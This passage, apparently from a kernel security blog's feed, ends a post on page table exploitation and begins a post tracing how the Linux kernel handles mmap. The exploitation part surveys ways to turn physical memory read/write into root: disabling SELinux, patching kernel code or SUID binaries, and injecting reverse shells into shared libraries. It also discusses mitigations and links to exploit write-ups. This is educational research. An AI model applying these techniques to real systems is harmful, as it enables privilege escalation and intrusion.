</span></span><span class="line"><span class="cl">Val:   0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  1  0  0  0  0  0  0  0
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">Bit:  31 30 29 28 27 26 25 24 23 22 21 20 19 18 17 16 15 14 13 12 11 10  9  8  7  6  5  4  3  2  1  0
</span></span><span class="line"><span class="cl">Val:   0  1  0  0  0  0  0  0  0  0  1  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0
</span></span></code></pre></div><p>In the paging primer earlier we showed that the entry offsets for the PGD, PUD, PMD, PT were stored in bits <code>39-47</code>, <code>30-38</code>, <code>21-29</code> and <code>12-20</code> respectively.  Here we can see those values correspond to <code>1</code>, <code>1</code>, <code>1</code> and <code>0</code>. The same as our previous guess!</p>
<p>Note that the next two mappings are each offset by <code>PAGE_SIZE</code>, i.e. one PT entry, so they should form 3 contiguous PT entries.</p>
<p>This is all still theoretical though so let&rsquo;s put out money where our mouth is. I set up a kernel debugging environment <a href="https://github.com/sam4k/linux-kernel-resources/tree/main/debugging">using gdb and x86_64 QEMU</a>. The plan is to:</p>
<ul>
<li>Run this program on the guest</li>
<li>When it pauses at <code>getchar()</code>, set a breakpoint in gdb at <code>vm_area_alloc(mm)</code></li>
<li>Continue the program, hit the breakpoint. We now, lazily, have a reference to our processes <code>mm_struct</code> which contains a pointer to its PGD. We can now walk our PGD and find out entries!</li>
</ul>
<p>And, just like that we can dump our processes PGD:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">(gdb) x/10gx mm-&gt;pgd
</span></span><span class="line"><span class="cl">0xffff888106b50000:     0x8000000100172067      0x8000000102c9b067
</span></span><span class="line"><span class="cl">0xffff888106b50010:     0x0000000000000000      0x0000000000000000
</span></span><span class="line"><span class="cl">0xffff888106b50020:     0x0000000000000000      0x0000000000000000
</span></span></code></pre></div><p>Great, so far so good. We can see <code>PGD[1]</code> is populated with <code>0x8000000102c9b067</code>. To find the address of the PUD this entry points to, we need to clear the metadata. This, for us, is bits 0:11 and 48:63. We can remove this with a simple mask: <code>0x8000000102c9b067 &amp; 0x0000FFFFFFFFF000 =  0x102C9B000</code>.</p>
<p>Awesome, so now we can move onto our PUD&hellip;</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">(gdb) x/10gx 0x102C9B000
</span></span><span class="line"><span class="cl">0x102c9b000:    Cannot access memory at address 0x102c9b000
</span></span></code></pre></div><p>Ah wait, that&rsquo;s a physical address right, and gdb is dealing with virtual addresses. Not to worry! Fortunately, the <a href="https://sam4k.com/linternals-virtual-memory-part-3/">kernel virtual address space</a> includes a direct mapping of all physical memory (physmap). For x86_64 this at <a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/include/asm/page_64_types.h#L45">__PAGE_OFFSET</a>, <code>0xffff888000000000</code>.</p>
<p>Sooo if that&rsquo;s the kernel virtual address mapped to the start of physical memory, we just need to offset that by our physical address and we should see our PMD&hellip;</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">(gdb) x/2gx (0xffff888000000000 + 0x102c9b000)
</span></span><span class="line"><span class="cl">0xffff888102c9b000:     0x0000000000000000      0x000000010436d067
</span></span></code></pre></div><p>Voila! And again, as expected, we have our entry at <code>PGD[1][1]</code>. Let&rsquo;s keep going:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">(gdb) x/2gx (0xffff888000000000 + (0x000000010436d067 &amp; 0x0000FFFFFFFFF000))
</span></span><span class="line"><span class="cl">0xffff88810436d000:     0x0000000000000000      0x0000000101346067
</span></span></code></pre></div><p>Now we&rsquo;re into the PMD and as expected, we see <code>PGD[1][1][1]</code> populated. The next step is the PT, where we should see three entries with slightly different permissions:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">(gdb) x/4gx (0xffff888000000000 + (0x0000000101346067 &amp; 0x0000FFFFFFFFF000))
</span></span><span class="line"><span class="cl">0xffff888101346000:     0x8000000107422067      0x80000000034ff225
</span></span><span class="line"><span class="cl">0xffff888101346010:     0x800000010743c025      0x0000000000000000
</span></span></code></pre></div><p>And just like that we&rsquo;ve walked our <code>mm</code>&rsquo;s PGD all the way down to a specific PT, containing our 3 mappings: R/W anonymous mapping, RO anonymous mapping and finally a RO file. Sweet!</p>
<p>I&rsquo;ll leave the examining of the various attributes, using the PTE diagram from the previous section, as an exercise to any interested readers, as I fear I&rsquo;ve sidetracked enough. The main goal of this little adventure is to demonstrate how you can get some hands on debugging and poke around to help build your understanding, as it can be vital when working on complex exploitation techniques like this!</p>
<p>Now, where were we - weighing up our options for exploitation if we have some level of control over a page table&hellip;</p>
<h4 id="approaches">Approaches</h4>
<p>So, depending on our primitive, here a couple of options we might consider:</p>
<ul>
<li>Overwriting the address bits (and maybe Page Size bit for PUD/PMD entries) to gain arbitrary physical address R/W (note, we&rsquo;ll discus phys KASLR later).</li>
<li>Overwriting permissions bits to gain R/W on a privileged file that is mapped into our processes virtual address space as read-only.</li>
</ul>
<p>Using our kernel AAW we could: disable SELinux, using one of the techniques outlined <a href="https://klecko.github.io/posts/selinux-bypasses">here</a>, such as overwriting the <code>selinux_state</code> singleton<a href="https://klecko.github.io/posts/selinux-bypasses/#bypass-1-disable-selinux">[3]</a><a href="https://soez.github.io/posts/CVE-2022-22265-Samsung-npu-driver/#disable-selinux">[4]</a>; patch the kernel to gain root (e.g. <code>setresuid()</code>, <code>setresgid()</code>)<a href="https://web.archive.org/web/20250304082609/https://yanglingxi1993.github.io/dirty_pagetable/dirty_pagetable.html#step3-patch-the-kernel">[5]</a><a href="https://ptr-yudai.hatenablog.com/entry/2023/12/08/093606#Escaping-from-nsjail">[6]</a>; overwrite <code>modprobe_path</code> because that&rsquo;s sometimes still a thing<a href="https://sam4k.com/like-techniques-modprobe_path/">[7]</a>; following the linked lists of tasks from <code>[init_task](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/sched/task.h#L58)</code> to elevate the privilege of your own <code>[cred](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/cred.h#L111)</code>s or forge <code>init</code>&rsquo;s etc. The world is our oyster (if our primitive is flexible enough&hellip;)!</p>
<p>As for files we might want to target, we could: patch shared libraries used by privileged processes to gain a reverse shell<a href="https://soez.github.io/posts/CVE-2022-22265-Samsung-npu-driver/#inject-code-into-libbaseso">[8]</a><a href="https://github.com/polygraphene/DirtyPipe-Android/blob/master/TECHNICAL-DETAILS.md#exploit-process">[9]</a><a href="https://starlabs.sg/blog/2025/12-mali-cious-intent-exploiting-gpu-vulnerabilities-cve-2022-22706/#exploitation-primitive">[10]</a>; patch SUID binaries to gain a privileged shell etc.</p>
<h4 id="on-caching">On Caching</h4>
<p>Before we get giddy with power, beyond the limitations of our primitive, there a few other things to consider: mitigations (which I&rsquo;ll cover in the next section) and caching.</p>
<p>So far we&rsquo;ve covered paging at a reasonably high level: the process of translating a virtual address to the correct physical address involves walking the appropriate page tables using the bits found in the virtual address.</p>
<p>This address translation is offloaded to the hardware and is the job of the Memory Management Unit (MMU). As you might imagine, this can get computationally expensive when you scale things up and also inefficient if we&rsquo;re constantly accessing the same pages of memory.</p>
<p>To address this, the hardware makes use of various caches, storing address translations (the primary cache for this being the Translation Lookaside Buffer (TLB)) and pages.  </p>
<p>If we start messing with page table entries or pages, in order for the hardware to actual see these changes, we need to flush the appropriate caches so they&rsquo;re updated with <em>our</em> version.</p>
<p>Of the write-ups I&rsquo;ve mentioned so far, the <a href="https://web.archive.org/web/20250304082609/https://yanglingxi1993.github.io/dirty_pagetable/dirty_pagetable.html">Dirty Pagetable article</a> has a <a href="https://web.archive.org/web/20250304082609/https://yanglingxi1993.github.io/dirty_pagetable/dirty_pagetable.html#61-how-to-flush-tlb-and-page-table-caches">section</a> on this for aarch64 and <a href="https://pwning.tech/nftables/">Flipping Pages article</a> has a <a href="https://pwning.tech/nftables/#47-tlb-flushing">section</a> rel to x86_64.</p>
<hr>
<ol>
<li><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/gfp.h#L16">https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/gfp.h#L16</a></li>
<li><a href="https://lwn.net/Articles/619514/">https://lwn.net/Articles/619514/</a></li>
<li><a href="https://klecko.github.io/posts/selinux-bypasses/#bypass-1-disable-selinux">https://klecko.github.io/posts/selinux-bypasses/#bypass-1-disable-selinux</a></li>
<li><a href="https://soez.github.io/posts/CVE-2022-22265-Samsung-npu-driver/#disable-selinux">https://soez.github.io/posts/CVE-2022-22265-Samsung-npu-driver/#disable-selinux</a> (aarch64)</li>
<li><a href="https://web.archive.org/web/20250304082609/https://yanglingxi1993.github.io/dirty_pagetable/dirty_pagetable.html#step3-patch-the-kernel">https://web.archive.org/web/20250304082609/https://yanglingxi1993.github.io/dirty_pagetable/dirty_pagetable.html#step3-patch-the-kernel</a> (aarch64)</li>
<li><a href="https://ptr-yudai.hatenablog.com/entry/2023/12/08/093606#Escaping-from-nsjail">https://ptr-yudai.hatenablog.com/entry/2023/12/08/093606#Escaping-from-nsjail</a> (x86_64)</li>
<li><a href="https://sam4k.com/like-techniques-modprobe_path/">https://sam4k.com/like-techniques-modprobe_path/</a></li>
<li><a href="https://soez.github.io/posts/CVE-2022-22265-Samsung-npu-driver/#inject-code-into-libbaseso">https://soez.github.io/posts/CVE-2022-22265-Samsung-npu-driver/#inject-code-into-libbaseso</a> (aarch64)</li>
<li><a href="https://github.com/polygraphene/DirtyPipe-Android/blob/master/TECHNICAL-DETAILS.md#exploit-process">https://github.com/polygraphene/DirtyPipe-Android/blob/master/TECHNICAL-DETAILS.md#exploit-process</a> (aarch64)</li>
<li><a href="https://starlabs.sg/blog/2025/12-mali-cious-intent-exploiting-gpu-vulnerabilities-cve-2022-22706/#exploitation-primitive">https://starlabs.sg/blog/2025/12-mali-cious-intent-exploiting-gpu-vulnerabilities-cve-2022-22706/#exploitation-primitive</a> (aarch64)</li>
</ol>
<h2 id="mitigations">Mitigations</h2>
<p><img src="https://sam4k.com/content/images/2025/05/fun_time_is_over.gif" alt=""></p>
<p>Alright, we&rsquo;ve had our fun, now it&rsquo;s time to face reality: mitigations. Of course, one of the perks of page table exploitation is that it sidesteps more common mitigations: virtual KASLR, CFI, doesn&rsquo;t need <code>modprobe_path</code>, random kmalloc caches and other heap mitigations; not to mention the permissions setup by page tables to protect memory acceses via virtual addresses. However, that&rsquo;s not to say there&rsquo;s <em>nothing</em> to worry about.</p>
<h3 id="physical-kaslr">Physical KASLR</h3>
<p>As I mentioned earlier, usually when we&rsquo;re talking about Kernel Address Space Layout Randomisation (KASLR), we&rsquo;re referring to kernel virtual address randomisation. However, as we&rsquo;re dealing with physical addresses, we&rsquo;re interested in physical KASLR.</p>
<p><code>[CONFIG_RANDOMIZE_BASE](https://cateee.net/lkddb/web-lkddb/RANDOMIZE_BASE.html)</code> is the kernel config option that enables randomising the address of the kernel image (KASLR). Below is the description for the x86_64 option:</p>
<blockquote>
<p>In support of Kernel Address Space Layout Randomization (KASLR), this randomizes the physical address at which the kernel image is decompressed and the virtual address where the kernel image is mapped, as a security feature that deters exploit attempts relying on knowledge of the location of kernel code internals.</p>
<p><strong>On 64-bit, the kernel physical and virtual addresses are randomized separately.</strong></p>
</blockquote>
<p>Now, let&rsquo;s look at the aarch64 description:</p>
<blockquote>
<p>Randomizes <strong>the virtual address</strong> at which the kernel image is loaded, as a security feature that deters exploit attempts relying on knowledge of the location of kernel internals.</p>
</blockquote>
<p>As far as I understand it, there is no upstream support for physical KASLR on aarch64. That said, if you&rsquo;re on Android, you&rsquo;re not out of the woods yet - Samsung have their own physical KASLR implementation, so don&rsquo;t stop reading just yet.</p>
<p>For x86_64, the kernel&rsquo;s physical base address is aligned to <code>[CONFIG_PHYSICAL_START](https://cateee.net/lkddb/web-lkddb/PHYSICAL_START.html)</code> (default being <code>0x1000000</code>). However, the physical address alignment can be explicitly defined by <code>[CONFIG_PHYSICAL_ALIGN](https://cateee.net/lkddb/web-lkddb/PHYSICAL_ALIGN.html)</code>, which is typically set to <code>0x200000</code> (which is the minimum value on x86_64).</p>
<p>Sooo how we approach this is going to be dependent on our primitive and whether we have control of a PT, PUD, PMD etc. But failing any context specific leaks, the most straightforward approach is simply brute forcing the available physical memory, taking advantage of alignment restrictions, reading the possible base addresses for known signatures either by updating PT entries or mapping huge pages of physical memory and doing it that.</p>
<h3 id="read-only-memory">Read-Only Memory</h3>
<p>Another mitigation that can thwart our page-level shenanigans is the use of read-only memory. But Sam, I hear you ask, we&rsquo;re dealing directly with physical addresses here, who&rsquo;s going to stop us?! As we&rsquo;ve mentioned, typically these protections are done during virtual address translation, but we&rsquo;re bypassing that, so what gives?</p>
<p>An example of this is Samsung&rsquo;s Real-time Kernel Protection (RKP), a hypervisor implementation which is part of <a href="https://www.samsungknox.com/en">Samsung KNOX</a>. I don&rsquo;t want to get too off track here, but essentially the hypervisor runs at a higher privilege level than even the kernel.</p>
<p>Moreover, it uses a 2 stage address translation to control how the kernel (and thus we) see physical memory. This essentially allows the hypervisor to mark memory as read-only so that even with our physical address read/write, it can still be caught by the hypervisor as it&rsquo;s operating at a higher privilege. This is a gross simplification, so if you&rsquo;re interested in reading more, checkout the awesome <a href="https://www.longterm.io/samsung_rkp.html">Samsung RKP Compendium</a>.</p>
<p>This can in turn be used to protect critical data structures such as SLAB caches (e.g. <code>cred_jar</code>), global variables, kernel page tables etc.</p>
<p>Note this isn&rsquo;t currently used (afaik) to protect user page tables, but it does narrow down the options available when exploiting the physical address read/write.</p>
<h2 id="resources">Resources</h2>
<p>Below is a list of all the resources I&rsquo;ve linked throughout the articles and any extras that are relevant to the topic of page table exploitation (if you think I&rsquo;ve missed any, <a href="https://x.com/sam4k1">lmk</a>!):</p>
<ol>
<li><a href="https://web.archive.org/web/20250304082609/https://yanglingxi1993.github.io/dirty_pagetable/dirty_pagetable.html">Dirty Pagetable: A Novel Exploitation Technique To Rule Linux Kernel</a> by <a href="https://x.com/NVamous">@NVamous</a> (2023) (aarch64) technique overview with 3 examples</li>
<li><a href="https://ptr-yudai.hatenablog.com/entry/2023/12/08/093606">&ldquo;Understanding Dirty Pagetable - m0leCon Finals 2023 CTF Writeup&rdquo;</a> by <a href="https://x.com/ptryudai">@ptrYudai</a> (2023) (x86_64) exploit write-up</li>
<li><a href="https://pwning.tech/nftables/">&ldquo;Flipping Pages: An analysis of a new Linux vulnerability in nf_tables and hardened exploitation techniques&rdquo;</a> by <a href="https://x.com/notselwyn/">@notselwyn</a> (2024) (x86_64) exploit write-up that expands on the Dirty Pagetable technique, covers phys KASLR bypass, cache flushing</li>
<li>PageJack (<a href="https://phrack.org/issues/71/13#article">Phrack article</a>, <a href="https://i.blackhat.com/BH-US-24/Presentations/US24-Qian-PageJack-A-Powerful-Exploit-Technique-With-Page-Level-UAF-Thursday.pdf">BlackHat slides</a>) (2024) technique overview</li>
<li><a href="https://powerofcommunity.net/poc2024/Pan%20Zhenpeng%20&amp;%20Jheng%20Bing%20Jhong,%20GPUAF%20-%20Two%20ways%20of%20rooting%20All%20Qualcomm%20based%20Android%20phones.pdf">GPUAF - Two ways of Rooting All Qualcomm based Android phones</a> (2024) (aarch64) exploit slides</li>
<li><a href="https://i.blackhat.com/BH-US-24/Presentations/REVISED02-US24-Gong-The-Way-to-Android-Root-Wednesday.pdf">The Way to Android Root: Exploiting Your GPU On Smartphone</a> (2024) (aarch64) exploit slides</li>
<li><a href="https://soez.github.io/posts/CVE-2022-22265-Samsung-npu-driver/">CVE-2022-22265 Samsung npu driver</a> (2024) (aarch64) exploit write-up that includes bypasses for Samsung DEFEX</li>
<li><a href="https://starlabs.sg/blog/2025/12-mali-cious-intent-exploiting-gpu-vulnerabilities-cve-2022-22706/#exploitation-primitive">Mali-cious Intent: Exploiting GPU Vulnerabilities (CVE-2022-22706 / CVE-2021-39793)</a> (2025) (aarch64) Mali GPU exploitation; demonstrates injecting hooks and payloads into read-only shared libraries</li>
</ol>
<p>RE internals and more background reading:</p>
<ol>
<li><a href="https://docs.kernel.org/mm/page_tables.html">Page Tables - Linux Kernel Docs</a> are a good place to start on fundamentals</li>
<li>Checkout my <a href="https://sam4k.com/linternals/">linternal series</a> for rundowns on page allocators and mm basics</li>
<li><a href="https://syst3mfailure.io/linux-page-allocator/">A Quick Dive Into The Linux Kernel Page Allocator</a> (2025) is a great look into the kernel&rsquo;s page allocator</li>
</ol>
<h2 id="wrapping-up">Wrapping Up</h2>
<p><img src="https://sam4k.com/content/images/2025/05/job_done.gif" alt=""></p>
<p>Boom, we did it! This has been a fun one to write, hopefully it&rsquo;s, if not fun, been a helpful read for anyone curious about the current trend of page table exploitation.</p>
<p>It&rsquo;s part of the broader cat and mouse game of security research, as mitigations catch up and become more widespread, attackers need to get more creative in bypassing or circumventing them completely. Often, this means going deeper and deeper into the internals. As we&rsquo;ve seen, by exploiting page tables and using physical memory addressing, we&rsquo;re essentially able to operate &ldquo;under&rdquo; the purview of traditional mitigations, such as the permission accesses done at the virtual address level.</p>
<p>That said, it&rsquo;s not quite the wild west, as, while not wide spread, mitigations for these techniques do exist. So I wonder where the next stop will be in this mitigations race!</p>
<p>If you&rsquo;re interested in digging deeper into page table internals, specifically with regards to kernel code and implementation, I&rsquo;ll be touching on that in the next part of <a href="https://sam4k.com/linternals/#memory-management">my <code>mm</code> series</a>.</p>
<p>As always feel free to @me (on <a href="https://twitter.com/sam4k1">X</a>, <a href="https://bsky.app/profile/sam4k.com">Bluesky</a> or less commonly used <a href="https://infosec.exchange/@sam4k">Mastodon</a>) if you have any questions, suggestions or corrections :)</p>
]]></content:encoded></item><item><title>Linternals: Exploring The mm Subsystem via mmap [0x02]</title><description>In this part we&amp;#39;ll use our case study to explore how the Linux kernel maps private anonymous memory.</description><link>https://sam4k.com/linternals-exploring-the-mm-subsystem-part-2/</link><guid isPermaLink="false">675f0187de619fc1154efe9b</guid><category>linux</category><category>kernel</category><category>memory</category><dc:creator>sam4k</dc:creator><pubDate>Fri, 25 Apr 2025 15:17:34 +0000</pubDate><media:content url="https://sam4k.com/content/images/2025/04/linternals.gif" medium="image"/><content:encoded><![CDATA[<p>Welcome back! <a href="https://sam4k.com/linternals-exploring-the-mm-subsystem-part-1/">Last time</a> I left us on a bit of a cliffhanger, rolling the credits just as we were getting into the thick of it, so I&rsquo;ll keep the intro brief.</p>
<p>The aim of this series is to explore the inner workings of the Linux kernel&rsquo;s memory management (mm) subsystem by examining how this simple program is implemented:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;sys/mman.h&gt;</span><span class="cp">
</span></span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="kt">void</span> <span class="o">*</span><span class="n">addr</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="n">addr</span> <span class="o">=</span> <span class="nf">mmap</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="mh">0x1000</span><span class="p">,</span> <span class="n">PROT_READ</span> <span class="o">|</span> <span class="n">PROT_WRITE</span><span class="p">,</span> <span class="n">MAP_ANONYMOUS</span> <span class="o">|</span> <span class="n">MAP_PRIVATE</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="o">*</span><span class="p">(</span><span class="kt">long</span><span class="o">*</span><span class="p">)</span><span class="n">addr</span> <span class="o">=</span> <span class="mh">0x4142434445464748</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="nf">munmap</span><span class="p">(</span><span class="n">addr</span><span class="p">,</span> <span class="mh">0x1000</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p>While I&rsquo;m making up the scope of this series as I go (seems fine), the general idea is to cover the mapping, writing and unmapping of memory in detail as the kernel sees it.</p>
<p>In the <a href="https://sam4k.com/linternals-exploring-the-mm-subsystem-part-1/">first part</a> of the series we covered:</p>
<ul>
<li>What memory management is and a brief overview of the kernel&rsquo;s mm subsystem</li>
<li>What our simple program does from the user&rsquo;s perspective and how it interacts with the kernel (it&rsquo;s only like 2 syscalls, how much could there be to cover&hellip;)</li>
<li>The start of our journey: how memory is mapped via the <code>mmap()</code> system call - argument marshalling, fetching the <code>mm_struct</code>, a bit of security, locking - right up until the actual implementation in <code>do_mmap()</code> anyway (sorry, that really was a cliffhanger)</li>
</ul>
<p>So without further ado, let&rsquo;s dive back into how (anonymous) memory is mapped via <code>mmap()</code>!</p>
<p><img src="https://sam4k.com/content/images/2025/04/lets_do_this.gif" alt=""></p>
<h2 id="contents">Contents</h2>
<ul>
<li><a href="#mapping-memory-cont">Mapping Memory (cont.)</a>
<ul>
<li><a href="#what-are-mappings">What Are Mappings?</a>
<ul>
<li><a href="#struct-vmareastruct"><code>struct vm_area_struct</code></a></li>
<li><a href="#mm-mmmt"><code>mm-&gt;mm_mt</code></a></li>
</ul>
</li>
<li><a href="#dommap"><code>do_mmap()</code></a>
<ul>
<li><a href="#finding-a-suitable-addr">Finding A Suitable <code>addr</code></a></li>
</ul>
</li>
<li><a href="#mmapregion"><code>mmap_region()</code></a>
<ul>
<li><a href="#vma-merging">VMA Merging</a></li>
<li><a href="#vma-allocation">VMA Allocation</a></li>
</ul>
</li>
<li><a href="#final-bits">Final Bits</a></li>
<li><a href="#summary">Summary</a></li>
</ul>
</li>
<li><a href="#next-time">Next Time</a></li>
</ul>
<h2 id="mapping-memory-cont">Mapping Memory (cont.)</h2>
<p>Broadly speaking, there are 3 things happening in our program: mapping some anonymous memory, writing to it and then unmapping it. Currently, we&rsquo;re digging into the first part:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="n">addr</span> <span class="o">=</span> <span class="nf">mmap</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="mh">0x1000</span><span class="p">,</span> <span class="n">PROT_READ</span> <span class="o">|</span> <span class="n">PROT_WRITE</span><span class="p">,</span> <span class="n">MAP_ANONYMOUS</span> <span class="o">|</span> <span class="n">MAP_PRIVATE</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
</span></span></code></pre></div><p>Let&rsquo;s quickly recap how deep in the mm subsystem we are, since making our <code>mmap(2)</code> system call from our userspace program. Using gdb we can set a breakpoint on <code>do_mmap()</code>, which is where we left off, and check the backtrace:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">(gdb) bt
</span></span><span class="line"><span class="cl">#0  do_mmap (file=file@entry=0x0 &lt;fixed_percpu_data&gt;, addr=0, len=4096, prot=3, flags=34, vm_flags=vm_flags@entry=0, pgoff=0, 
</span></span><span class="line"><span class="cl">    populate=0xffffc90001a17e80, uf=0xffffc90001a17ea0) at mm/mmap.c:1215
</span></span><span class="line"><span class="cl">#1  0xffffffff8162aabc in vm_mmap_pgoff (file=file@entry=0x0 &lt;fixed_percpu_data&gt;, addr=&lt;optimized out&gt;, len=&lt;optimized out&gt;, 
</span></span><span class="line"><span class="cl">    prot=&lt;optimized out&gt;, flag=&lt;optimized out&gt;, pgoff=&lt;optimized out&gt;) at mm/util.c:556
</span></span><span class="line"><span class="cl">#2  0xffffffff816a4d7c in ksys_mmap_pgoff (addr=0, len=4096, prot=3, flags=34, fd=&lt;optimized out&gt;, pgoff=0) at mm/mmap.c:1427
</span></span><span class="line"><span class="cl">#3  0xffffffff810a894f in __do_sys_mmap (addr=0, off=&lt;optimized out&gt;, len=&lt;optimized out&gt;, prot=&lt;optimized out&gt;, flags=&lt;optimized out&gt;, 
</span></span><span class="line"><span class="cl">    fd=&lt;optimized out&gt;) at arch/x86/kernel/sys_x86_64.c:93
</span></span><span class="line"><span class="cl">#4  0xffffffff8100507f in x64_sys_call (regs=regs@entry=0xffffc90001a17f58, nr=nr@entry=9) at arch/x86/entry/syscall_64.c:29
</span></span><span class="line"><span class="cl">#5  0xffffffff844328b1 in do_syscall_x64 (regs=0xffffc90001a17f58, nr=&lt;optimized out&gt;) at arch/x86/entry/common.c:51
</span></span><span class="line"><span class="cl">#6  do_syscall_64 (regs=0xffffc90001a17f58, nr=&lt;optimized out&gt;) at arch/x86/entry/common.c:81
</span></span><span class="line"><span class="cl">#7  0xffffffff84600130 in entry_SYSCALL_64 () at arch/x86/entry/entry_64.S:121
</span></span></code></pre></div><p>backtrace for our program&rsquo;s mmap() call (on a 6.11.5 kernel)</p>
<p>So far these functions have mostly been sanitisting arguments, doing necessary security checks and taking the all important <code>[mmap_write_lock_killable(mm)](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mmap_lock.h#L117)</code>.</p>
<p>Before we continue where we left off, about to dive into <code>[do_mmap()](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm.h#L3410)</code>, I&rsquo;m going to touch on some key background which will provide important context for the rest of the post!</p>
<h3 id="what-are-mappings">What Are Mappings?</h3>
<p>We probably shouldn&rsquo;t go much further down the memory mapping rabbit hole without first covering what a mapping is, or at least how the kernel represents them.</p>
<p>When we call <code>[mmap()](https://man7.org/linux/man-pages/man2/mmap.2.html)</code> in our userspace program, we&rsquo;re looking to &ldquo;map&rdquo; some memory into our virtual address space. This could be a file or some anonymous memory (aka physical memory allocated for us to use), which can then be accessed via a virtual address in our processes&rsquo; virtual address space.</p>
<p>So a mapping in this context is essentially a virtual address range which is mapped to some physical memory. We can explore a processes mappings via <code>procfs</code>. Let&rsquo;s see if we can find our programs <code>0x1000</code> byte mapping:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-gdscript3" data-lang="gdscript3"><span class="line"><span class="cl"><span class="o">$</span> <span class="n">cat</span> <span class="o">/</span><span class="n">proc</span><span class="o">/</span><span class="mi">91280</span><span class="o">/</span><span class="n">maps</span>
</span></span><span class="line"><span class="cl"><span class="mi">00400000</span><span class="o">-</span><span class="mi">00401000</span> <span class="n">r</span><span class="o">--</span><span class="n">p</span> <span class="mi">00000000</span> <span class="mi">00</span><span class="p">:</span><span class="mi">2</span><span class="n">b</span> <span class="mi">12253872</span>                           <span class="n">mm_example</span>
</span></span><span class="line"><span class="cl"><span class="mi">00401000</span><span class="o">-</span><span class="mi">0047</span><span class="n">c000</span> <span class="n">r</span><span class="o">-</span><span class="n">xp</span> <span class="mi">00001000</span> <span class="mi">00</span><span class="p">:</span><span class="mi">2</span><span class="n">b</span> <span class="mi">12253872</span>                           <span class="n">mm_example</span>
</span></span><span class="line"><span class="cl"><span class="mi">0047</span><span class="n">c000</span><span class="o">-</span><span class="mi">004</span><span class="n">a4000</span> <span class="n">r</span><span class="o">--</span><span class="n">p</span> <span class="mi">0007</span><span class="n">c000</span> <span class="mi">00</span><span class="p">:</span><span class="mi">2</span><span class="n">b</span> <span class="mi">12253872</span>                           <span class="n">mm_example</span>
</span></span><span class="line"><span class="cl"><span class="mi">004</span><span class="n">a4000</span><span class="o">-</span><span class="mi">004</span><span class="n">a9000</span> <span class="n">r</span><span class="o">--</span><span class="n">p</span> <span class="mi">000</span><span class="n">a3000</span> <span class="mi">00</span><span class="p">:</span><span class="mi">2</span><span class="n">b</span> <span class="mi">12253872</span>                           <span class="n">mm_example</span>
</span></span><span class="line"><span class="cl"><span class="mi">004</span><span class="n">a9000</span><span class="o">-</span><span class="mi">004</span><span class="n">ab000</span> <span class="n">rw</span><span class="o">-</span><span class="n">p</span> <span class="mi">000</span><span class="n">a8000</span> <span class="mi">00</span><span class="p">:</span><span class="mi">2</span><span class="n">b</span> <span class="mi">12253872</span>                           <span class="n">mm_example</span>
</span></span><span class="line"><span class="cl"><span class="mi">004</span><span class="n">ab000</span><span class="o">-</span><span class="mi">004</span><span class="n">b1000</span> <span class="n">rw</span><span class="o">-</span><span class="n">p</span> <span class="mi">00000000</span> <span class="mi">00</span><span class="p">:</span><span class="mi">00</span> <span class="mi">0</span> 
</span></span><span class="line"><span class="cl"><span class="mi">15</span><span class="n">b3e000</span><span class="o">-</span><span class="mi">15</span><span class="n">b60000</span> <span class="n">rw</span><span class="o">-</span><span class="n">p</span> <span class="mi">00000000</span> <span class="mi">00</span><span class="p">:</span><span class="mi">00</span> <span class="mi">0</span>                                  <span class="p">[</span><span class="n">heap</span><span class="p">]</span>
</span></span><span class="line"><span class="cl"><span class="mi">7</span><span class="n">f556e60a000</span><span class="o">-</span><span class="mi">7</span><span class="n">f556e60b000</span> <span class="n">rw</span><span class="o">-</span><span class="n">p</span> <span class="mi">00000000</span> <span class="mi">00</span><span class="p">:</span><span class="mi">00</span> <span class="mi">0</span> 
